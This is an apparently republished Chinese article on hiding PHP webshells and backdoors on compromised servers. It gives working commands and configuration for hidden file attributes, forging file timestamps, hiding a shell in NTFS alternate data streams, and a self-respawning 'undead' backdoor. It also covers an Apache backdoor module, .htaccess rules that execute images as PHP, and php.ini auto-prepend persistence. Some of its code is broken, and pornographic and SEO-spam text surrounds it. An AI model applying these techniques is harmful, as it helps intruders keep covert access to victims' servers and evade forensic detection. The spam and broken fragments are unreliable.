成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

PHP后門隱藏技巧

安全 應用安全

 如果想讓自己的Webshell留的更久一些,除了Webshell要免殺,還需要注意一些隱藏技巧,比如隱藏文件,修改時間屬性,隱藏文件內容等。

1、隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

attrib +s +a +h +r shell.php //隱藏shell.php文件

2、修改文件時間屬性

當你試圖在一堆文件中隱藏自己新創建的文件,那么,除了創建一個迷惑性的文件名,還需要修改文件的修改日期。

//修改時間修改Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"//訪問時間修改Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"//創建時間修改Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令獲取文件屬性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某個文件夾下所有文件的創建和修改時間

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隱藏文件內容

在服務器上echo一個數據流文件進去,比如index.php是網頁正常文件,我們可以這樣子搞:

echo ^ > index.php:hidden.jpg

這樣子就生成了一個不可見的shell hidden.jpg,常規的文件管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。

利用include函數,將index.php:hidden.jpg進行hex編碼,把這個ADS文件include進去,這樣子就可以正常解析我們的一句話了。

4、不死馬

不死馬會刪除自身,以進程的形式循環創建隱蔽的后門。

'); //創建shell.php,這里最好用免殺的一句話 sleep(10); //間隔時間}?>

處理方式最簡單有效的辦法,就是重啟服務就可以刪除webshell文件。

5、中間件后門

將編譯好的so文件復制到modules文件夾,啟動后門模塊,重啟Apache。當發送特定參數的字符串過去時,即可觸發后門。

github項目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404頁面隱藏后門

404頁面主要用來提升用戶體驗,可用來隱藏后門文件。

The requested URL was not found on this server.

 

7、利用 .htaccess 文件構成PHP后門

一般.htaccess可以用來留后門和針對黑名單繞過,在上傳目錄創建.htaccess 文件寫入,無需重啟即可生效,上傳png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析規則,把文件名包含1的解析成php,上傳1.txt即可解析。

SetHandler application/x-httpd-php

8、利用 php.ini 隱藏后門文件

php.ini 中可以指定在主文件執行前后自動解析的文件名稱,常用于頁面公共頭部和尾部,也可以用來隱藏php后門。

;在PHP文檔之前自動添加文件。auto_prepend_file = "c:\tmp.txt";在PHP文檔之后自動添加文件。auto_prepend_file = "c:\tmp.txt"

需重啟服務生效,訪問任意一個php文件即可獲取webshell。

責任編輯:武曉燕 來源: Bypass
相關推薦

2018-07-18 11:18:13

2014-05-23 09:56:27

2011-03-30 10:53:45

2013-08-20 16:16:19

2013-07-29 10:02:42

2024-05-31 13:18:44

2010-09-13 15:06:36

2010-09-13 14:47:58

2009-12-09 17:33:22

PHP性能優化

2009-12-11 17:57:13

PHP應用JSON

2014-10-08 09:33:09

2009-12-11 16:44:33

PHP冒泡排序

2021-03-30 10:57:46

源碼惡意軟件攻擊

2013-05-10 10:56:09

2010-09-13 14:57:29

2010-09-13 15:14:03

2009-12-03 16:54:36

PHP獲取中國IP段

2015-04-02 11:37:54

2020-06-21 13:57:21

JavaScript開發代碼

2009-12-10 17:54:57

PHP刪除Cookie
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品久久久久久久毛片 | 欧美一级免费片 | 精品国产一区二区三区四区在线 | 免费成人毛片 | 国产激情精品一区二区三区 | 日韩激情视频一区 | 91精品国产91久久久久久最新 | av在线播放不卡 | 久久精品色欧美aⅴ一区二区 | 91最新入口 | 久久久久国产精品一区三寸 | 久久精品毛片 | 国产成人黄色 | 亚洲欧美日韩在线 | 四虎永久免费地址 | 久久精品国产精品青草 | 国产在线精品一区二区三区 | 亚洲国产一区二区视频 | 亚洲一区自拍 | 九九综合| 国产在线拍偷自揄拍视频 | 久久91精品久久久久久9鸭 | 精品久久久久久亚洲综合网站 | 射久久| 五月激情综合 | 免费国产一区二区 | 在线观看国产精品视频 | 国产欧美一区二区精品忘忧草 | 中文字幕第49页 | 黄色毛片黄色毛片 | www.日本精品 | 一二三区视频 | 中文字幕第十页 | 久久高清免费视频 | 男女视频在线观看 | www.久久精品视频 | 中文在线观看视频 | 国产成人99久久亚洲综合精品 | 91国产精品在线 | 日韩一区二区在线视频 | 日日骚网 |